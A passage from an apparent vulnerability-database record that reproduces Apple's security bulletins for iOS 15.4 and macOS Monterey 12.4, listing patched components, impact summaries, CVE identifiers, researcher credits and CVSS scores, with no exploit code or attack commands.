arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2022-22667: Justin Sherman of the University of Maryland, Baltimore County\n\n**ImageIO**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2022-22611: Xingyu Jin of Google\n\n**ImageIO**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted image may lead to heap corruption\n\nDescription: A memory consumption issue was addressed with improved memory handling.\n\nCVE-2022-22612: Xingyu Jin of Google\n\n**IOGPUFamily**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2022-22641: Mohamed Ghannam (@_simo36)\n\n**iTunes**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A malicious website may be able to access information about the user and their devices\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2022-22653: Aymeric Chaib of CERT Banque de France\n\n**Kernel**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2022-22596: an anonymous researcher\n\nCVE-2022-22640: sqrtpwn\n\n**Kernel**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2022-22613: Alex, an anonymous researcher\n\n**Kernel**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2022-22614: an anonymous researcher\n\nCVE-2022-22615: an anonymous researcher\n\n**Kernel**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A malicious application may be able to elevate privileges\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2022-22632: Keegan Saunders\n\n**Kernel**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: An attacker in a privileged position may be able to perform a denial of service attack\n\nDescription: A null pointer dereference was addressed with improved validation.\n\nCVE-2022-22638: derrek (@derrekr6)\n\n**LaunchServices**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: An app may be able to bypass certain Privacy preferences\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2021-30946: @gorelics, and Ron Masas of BreakPoint.sh\n\nEntry added March 16, 2023\n\n**libarchive**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Multiple issues in libarchive\n\nDescription: Multiple memory corruption issues existed in libarchive. These issues were addressed with improved input validation.\n\nCVE-2021-36976\n\n**LLVM**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: An application may be able to delete files for which it does not have permission\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2022-21658: Florian Weimer (@fweimer)\n\nEntry added May 25, 2022\n\n**Markup**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A person with physical access to an iOS device may be able to see sensitive information via keyboard suggestions\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-22622: Ingyu Lim (@_kanarena)\n\n**MediaRemote**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A malicious application may be able to identify what other applications a user has installed\n\nDescription: An access issue was addressed with improved access restrictions.\n\nCVE-2022-22670: Brandon Azad\n\n**MobileAccessoryUpdater**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2022-22672: Siddharth Aeri (@b1n4r1b01)\n\nEntry added May 25, 2022\n\n**NetworkExtension**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: An attacker in a privileged network position may be able to leak sensitive user information\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2022-22659: George Chen Kaidi of PayPal\n\nEntry updated May 25, 2022\n\n**Phone**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A user may be able to bypass the Emergency SOS passcode prompt\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-22618: Yicong Ding (@AntonioDing)\n\n**Preferences**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A malicious application may be able to read other applications' settings\n\nDescription: The issue was addressed with additional permissions checks.\n\nCVE-2022-22609: Mickey Jin (@patch1t), and Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (xlab.tencent.com)\n\nEntry updated May 11, 2023 \n\n**Sandbox**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: An app may be able to leak sensitive user information\n\nDescription: An access issue was addressed with improvements to the sandbox.\n\nCVE-2022-22655: Csaba Fitzl (@theevilbit) of Offensive Security\n\nEntry added March 16, 2023, updated June 7, 2023 \n\n**Sandbox**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A malicious application may be able to bypass certain Privacy preferences\n\nDescription: The issue was addressed with improved permissions logic.\n\nCVE-2022-22600: Sudhakar Muthumani (@sudhakarmuthu04) of Primefort Private Limited, Khiem Tran\n\nEntry updated May 25, 2022\n\n**Siri**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A person with physical access to a device may be able to use Siri to obtain some location information from the lock screen\n\nDescription: A permissions issue was addressed with improved validation.\n\nCVE-2022-22599: Andrew Goldberg of the University of Texas at Austin, McCombs School of Business (linkedin.com/andrew-goldberg-/)\n\nEntry updated May 25, 2022 \n\n**SoftwareUpdate**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2022-22639: Mickey (@patch1t)\n\n**UIKit**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A person with physical access to an iOS device may be able to see sensitive information via keyboard suggestions\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-22621: Joey Hewitt\n\n**VoiceOver**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A person with physical access to an iOS device may be able to access photos from the lock screen\n\nDescription: An authentication issue was addressed with improved state management.\n\nCVE-2022-22671: videosdebarraquito\n\n**WebKit**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing maliciously crafted web content may disclose sensitive user information\n\nDescription: A cookie management issue was addressed with improved state management.\n\nWebKit Bugzilla: 232748 \nCVE-2022-22662: Prakash (@1lastBr3ath) of Threat Nix\n\n**WebKit**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing maliciously crafted web content may lead to code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nWebKit Bugzilla: 232812 \nCVE-2022-22610: Quan Yin of Bigo Technology Live Client Team\n\n**WebKit**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed with improved memory management.\n\nWebKit Bugzilla: 233172 \nCVE-2022-22624: Kirin (@Pwnrin) of Tencent Security Xuanwu Lab\n\nWebKit Bugzilla: 234147 \nCVE-2022-22628: Kirin (@Pwnrin) of Tencent Security Xuanwu Lab\n\n**WebKit**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A buffer overflow issue was addressed with improved memory handling.\n\nWebKit Bugzilla: 234966 \nCVE-2022-22629: Jeonghoon Shin at Theori working with Trend Micro Zero Day Initiative\n\n**WebKit**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A malicious website may cause unexpected cross-origin behavior\n\nDescription: A logic issue was addressed with improved state management.\n\nWebKit Bugzilla: 235294 \nCVE-2022-22637: Tom McKee of Google\n\n**Wi-Fi**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A malicious application may be able to leak sensitive user information\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2022-22668: MrPhil17\n\nEntry added May 25, 2022\n\n**Wi-Fi**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A malicious application may be able to leak sensitive user information\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2022-22668: MrPhil17\n\n\n\n## Additional recognition\n\n**AirDrop**\n\nWe would like to acknowledge Omar Espino (omespino.com), Ron Masas of BreakPoint.sh for their assistance.\n\n**Bluetooth**\n\nWe would like to acknowledge an anonymous researcher for their assistance.\n\n**Music**\n\nWe would like to acknowledge Vishesh Balani of Urban Company for their assistance.\n\n**Notes**\n\nWe would like to acknowledge Abhishek Bansal of Wipro Technologies for their assistance.\n\n**Safari**\n\nWe would like to acknowledge Konstantin Darutkin of FingerprintJS (fingerprintjs.com) for their assistance.\n\n**Shortcuts**\n\nWe would like to acknowledge Baibhav Anand Jha of Streamers Land for their assistance.\n\n**Siri**\n\nWe would like to acknowledge an anonymous researcher for their assistance.\n\n**syslog**\n\nWe would like to acknowledge Yonghwi Jin (@jinmo123) of Theori for their assistance.\n\n**UIKit**\n\nWe would like to acknowledge Tim Shadel of Day Logger, Inc. for their assistance.\n\n**Wallet**\n\nWe would like to acknowledge an anonymous researcher for their assistance.\n\n**WebKit**\n\nWe would like to acknowledge Abdullah Md Shaleh for their assistance.\n\n**WebKit Storage**\n\nWe would like to acknowledge Martin Bajanik of FingerprintJS for their assistance.\n\n**WidgetKit**\n\nWe would like to acknowledge an anonymous researcher for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: June 07, 2023\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-14T00:00:00", "type": "apple", "title": "About the security content of iOS 15.4 and iPadOS 15.4", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30946", "CVE-2021-36976", "CVE-2022-21658", "CVE-2022-22596", "CVE-2022-22598", "CVE-2022-22599", "CVE-2022-22600", "CVE-2022-22609", "CVE-2022-22610", "CVE-2022-22611", "CVE-2022-22612", "CVE-2022-22613", "CVE-2022-22614", "CVE-2022-22615", "CVE-2022-22618", "CVE-2022-22621", "CVE-2022-22622", "CVE-2022-22624", "CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22632", "CVE-2022-22633", "CVE-2022-22634", "CVE-2022-22635", "CVE-2022-22636", "CVE-2022-22637", "CVE-2022-22638", "CVE-2022-22639", "CVE-2022-22640", "CVE-2022-22641", "CVE-2022-22642", "CVE-2022-22643", "CVE-2022-22652", "CVE-2022-22653", "CVE-2022-22655", "CVE-2022-22659", "CVE-2022-22662", "CVE-2022-22663", "CVE-2022-22666", "CVE-2022-22667", "CVE-2022-22668", "CVE-2022-22670", "CVE-2022-22671", "CVE-2022-22672"], "modified": "2022-03-14T00:00:00", "id": "APPLE:C3C11978B39895CE213B101070C72A90", "href": "https://support.apple.com/kb/HT213182", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-09T14:23:03", "description": "# About the security content of macOS Monterey 12.4\n\nThis document describes the security content of macOS Monterey 12.4.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## macOS Monterey 12.4\n\nReleased May 16, 2022\n\n**AMD**\n\nAvailable for: macOS Monterey\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2022-26772: an anonymous researcher\n\n**AMD**\n\nAvailable for: macOS Monterey\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow issue was addressed with improved memory handling.\n\nCVE-2022-26741: ABC Research s.r.o\n\nCVE-2022-26742: ABC Research s.r.o\n\nCVE-2022-26749: ABC Research s.r.o\n\nCVE-2022-26750: ABC Research s.r.o\n\nCVE-2022-26752: ABC Research s.r.o\n\nCVE-2022-26753: ABC Research s.r.o\n\nCVE-2022-26754: ABC Research s.r.o\n\n**apache**\n\nAvailable for: macOS Monterey\n\nImpact: Multiple issues in apache\n\nDescription: Multiple issues were addressed by updating apache to version 2.4.53.\n\nCVE-2021-44224\n\nCVE-2021-44790\n\nCVE-2022-22719\n\nCVE-2022-22720\n\nCVE-2022-22721\n\n**AppleGraphicsControl**\n\nAvailable for: macOS Monterey\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2022-26751: Michael DePlante (@izobashi) of Trend Micro Zero Day Initiative\n\n**AppleMobileFileIntegrity**\n\nAvailable for: macOS Monterey\n\nImpact: A user may be able to view sensitive user information\n\nDescription: An issue in the handling of environment variables was addressed with improved validation.\n\nCVE-2022-26707: Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n\nEntry added July 6, 2022\n\n**AppleScript**\n\nAvailable for: macOS Monterey\n\nImpact: Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory\n\nDescription: An out-of-bounds read issue was addressed with improved input validation.\n\nCVE-2022-26697: Qi Sun and Robert Ai of Trend Micro\n\n**AppleScript**\n\nAvailable for: macOS Monterey\n\nImpact: Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory\n\nDescription: An out-of-bounds read issue was addressed with improved bounds checking.\n\nCVE-2022-26698: Qi Sun of Trend Micro, Ye Zhang (@co0py_Cat) of Baidu Security\n\nEntry updated July 6, 2022\n\n**AVEVideoEncoder**\n\nAvailable for: macOS Monterey\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2022-26736: an anonymous researcher\n\nCVE-2022-26737: an anonymous researcher\n\nCVE-2022-26738: an anonymous researcher\n\nCVE-2022-26739: an anonymous researcher\n\nCVE-2022-26740: an anonymous researcher\n\n**Bluetooth**\n\nAvailable for: macOS Monterey\n\nImpact: An app may gain unauthorized access to Bluetooth\n\nDescription: A logic issue was addressed with improved checks.\n\nCVE-2022-32783: Jon Thompson of Evolve (Des Moines, IA)\n\nEntry added July 6, 2022\n\n**Contacts**\n\nAvailable for: macOS Monterey\n\nImpact: A plug-in may be able to inherit the application's permissions and access user data\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-26694: Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n\n**CVMS**\n\nAvailable for: macOS Monterey\n\nImpact: A malicious application may be able to gain root privileges\n\nDescription: A memory initialization issue was addressed.\n\nCVE-2022-26721: Yonghwi Jin (@jinmo123) of Theori\n\nCVE-2022-26722: Yonghwi Jin (@jinmo123) of Theori\n\n**DriverKit**\n\nAvailable for: macOS Monterey\n\nImpact: A malicious application may be able to execute arbitrary code with system privileges\n\nDescription: An out-of-bounds access issue was addressed with improved bounds checking.\n\nCVE-2022-26763: Linus Henze of Pinauten GmbH (pinauten.de)\n\n**FaceTime**\n\nAvailable for: macOS Monterey\n\nImpact: An app with root privileges may be able to access private information\n\nDescription: This issue was addressed by enabling hardened runtime.\n\nCVE-2022-32781: Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n\nEntry added July 6, 2022\n\n**ImageIO**\n\nAvailable for: macOS Monterey\n\nImpact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution\n\nDescription: An integer overflow issue was addressed with improved input validation.\n\nCVE-2022-26711: actae0n of Blacksun Hackers Club working with Trend Micro Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: macOS Monterey\n\nImpact: Photo location information may persist after it is removed with Preview Inspector\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2022-26725: Andrew Williams and Avi Drissman of Google\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Monterey\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2022-26720: Liu Long of Ant Security Light-Year Lab\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Monterey\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2022-26769: Antonio Zekic (@antoniozekic)\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Monterey\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: An out-of-bounds read issue was addressed with improved input validation.\n\nCVE-2022-26770: Liu Long of Ant Security Light-Year Lab\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Monterey\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved input validation.\n\nCVE-2022-26748: Jeonghoon Shin of Theori working with Trend Micro Zero Day Initiative\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Monterey\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An out-of-bounds write issue was addressed with improved input validation.\n\nCVE-2022-26756: Jack Dates of RET2 Systems, Inc\n\n**IOKit**\n\nAvailable for: macOS Monterey\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2022-26701: chenyuwang (@mzzzz__) of Tencent Security Xuanwu Lab\n\n**IOMobileFrameBuffer**\n\nAvailable for: macOS Monterey\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2022-26768: an anonymous researcher\n\n**Kernel**\n\nAvailable for: macOS Monterey\n\nImpact: An attacker that has already achieved code execution in macOS Recovery may be able to escalate to kernel privileges\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2022-26743: Jordy Zomer (@pwningsystems)\n\n**Kernel**\n\nAvailable for: macOS Monterey\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2022-26714: Peter Nguy\u1ec5n V\u0169 Ho\u00e0ng (@peternguyen14) of STAR Labs (@starlabs_sg)\n\n**Kernel**\n\nAvailable for: macOS Monterey\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2022-26757: Ned Williamson of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Monterey\n\nImpact: An attacker that has already achieved kernel code execution may be able to bypass kernel memory mitigations\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2022-26764: Linus Henze of Pinauten GmbH (pinauten.de)\n\n**Kernel**\n\nAvailable for: macOS Monterey\n\nImpact: A malicious attacker with arbitrary read and write capability may be able to bypass Pointer Authentication\n\nDescription: A race condition was addressed with improved state handling.\n\nCVE-2022-26765: Linus Henze of Pinauten GmbH (pinauten.de)\n\n**LaunchServices**\n\nAvailable for: macOS Monterey\n\nImpact: A sandboxed process may be able to circumvent sandbox restrictions\n\nDescription: An access issue was addressed with additional sandbox restrictions on third-party applications.\n\nCVE-2022-26706: Arsenii Kostromin (0x3c3e), Jonathan Bar Or of Microsoft\n\nEntry updated July 6, 2022\n\n**LaunchServices**\n\nAvailable for: macOS Monterey\n\nImpact: A malicious application may be able to bypass Privacy preferences\n\nDescription: The issue was addressed with additional permissions checks.\n\nCVE-2022-26767: Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n\n**Libinfo**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to bypass Privacy preferences\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-32882: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab\n\nEntry added September 16, 2022\n\n**libresolv**\n\nAvailable for: macOS Monterey\n\nImpact: A remote user may be able to cause a denial-of-service\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-32790: Max Shavrick (@_mxms) of the Google Security Team\n\nEntry added June 21, 2022\n\n**libresolv**\n\nAvailable for: macOS Monterey\n\nImpact: An attacker may be able to cause unexpected application termination or arbitrary code execution\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-26776: Zubair Ashraf of Crowdstrike, Max Shavrick (@_mxms) of the Google Security Team\n\nCVE-2022-26708: Max Shavrick (@_mxms) of the Google Security Team\n\n**libresolv**\n\nAvailable for: macOS Monterey\n\nImpact: An attacker may be able to cause unexpected application termination or arbitrary code execution\n\nDescription: An integer overflow was addressed with improved input validation.\n\nCVE-2022-26775: Max Shavrick (@_mxms) of the Google Security Team\n\n**LibreSSL**\n\nAvailable for: macOS Monterey\n\nImpact: Processing a maliciously crafted certificate may lead to a denial of service\n\nDescription: A denial of service issue was addressed with improved input validation.\n\nCVE-2022-0778\n\n**libxml2**\n\nAvailable for: macOS Monterey\n\nImpact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2022-23308\n\n**OpenSSL**\n\nAvailable for: macOS Monterey\n\nImpact: Processing a maliciously crafted certificate may lead to a denial of service\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-0778\n\n**PackageKit**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to gain elevated privileges\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2022-32794: Mickey Jin (@patch1t)\n\nEntry added October 4, 2022\n\n**PackageKit**\n\nAvailable for: macOS Monterey\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2022-22617: Mickey Jin (@patch1t)\n\nEntry added July 6, 2022\n\n**PackageKit**\n\nAvailable for: macOS Monterey\n\nImpact: A malicious application may be able to modify protected parts of the file system\n\nDescription: This issue was addressed by removing the vulnerable code.\n\nCVE-2022-26712: Mickey Jin (@patch1t)\n\n**PackageKit**\n\nAvailable for: macOS Monterey\n\nImpact: A malicious application may be able to modify protected parts of the file system\n\nDescription: This issue was addressed with improved entitlements.\n\nCVE-2022-26727: Mickey Jin (@patch1t)\n\n**Photo Booth**\n\nAvailable for: macOS Monterey\n\nImpact: An app with root privileges may be able to access private information\n\nDescription: This issue was addressed by enabling hardened runtime.\n\nCVE-2022-32782: Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n\nEntry added July 6, 2022\n\n**Preview**\n\nAvailable for: macOS Monterey\n\nImpact: A plug-in may be able to inherit the application's permissions and access user data\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-26693: Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n\n**Printing**\n\nAvailable for: macOS Monterey\n\nImpact: A malicious application may be able to bypass Privacy preferences\n\nDescription: This issue was addressed by removing the vulnerable code.\n\nCVE-2022-26746: @gorelics\n\n**Safari Private Browsing**\n\nAvailable for: macOS Monterey\n\nImpact: A malicious website may be able to track users in Safari private browsing mode\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2022-26731: an anonymous researcher\n\n**Security**\n\nAvailable for: macOS Monterey\n\nImpact: A malicious app may be able to bypass signature validation\n\nDescription: A certificate parsing issue was addressed with improved checks.\n\nCVE-2022-26766: Linus Henze of Pinauten GmbH (pinauten.de)\n\n**SMB**\n\nAvailable for: macOS Monterey\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2022-26715: Peter Nguy\u1ec5n V\u0169 Ho\u00e0ng of STAR Labs\n\n**SMB**\n\nAvailable for: macOS Monterey\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: An out-of-bounds read issue was addressed with improved input validation.\n\nCVE-2022-26718: Peter Nguy\u1ec5n V\u0169 Ho\u00e0ng of STAR Labs\n\n**SMB**\n\nAvailable for: macOS Monterey\n\nImpact: Mounting a maliciously crafted Samba network share may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2022-26723: Felix Poulin-Belanger\n\n**SoftwareUpdate**\n\nAvailable for: macOS Monterey\n\nImpact: A malicious application may be able to access restricted files\n\nDescription: This issue was addressed with improved entitlements.\n\nCVE-2022-26728: Mickey Jin (@patch1t)\n\n**Spotlight**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to gain elevated privileges\n\nDescription: A validation issue existed in the handling of symlinks and was addressed with improved validation of symlinks.\n\nCVE-2022-26704: Joshua Mason of Mandiant\n\nEntry updated July 6, 2022\n\n**TCC**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to capture a user's screen\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-26726: Antonio Cheong Yu Xuan of YCISCQ\n\nEntry updated May 11, 2023\n\n**Tcl**\n\nAvailable for: macOS Monterey\n\nImpact: A malicious application may be able to break out of its sandbox\n\nDescription: This issue was addressed with improved environment sanitization.\n\nCVE-2022-26755: Arsenii Kostromin (0x3c3e)\n\n**Terminal**\n\nAvailable for: macOS Monterey\n\nImpact: A sandboxed process may be able to circumvent sandbox restrictions\n\nDescription: This issue was addressed with improved environment sanitization.\n\nCVE-2022-26696: Ron Waisberg, Ron Hass (@ronhass7) of Perception Point, and Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n\nEntry added September 16, 2022, updated May 11, 2023 \n\n**WebKit**\n\nAvailable for: macOS Monterey\n\nImpact: Processing maliciously crafted web content may lead to code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nWebKit 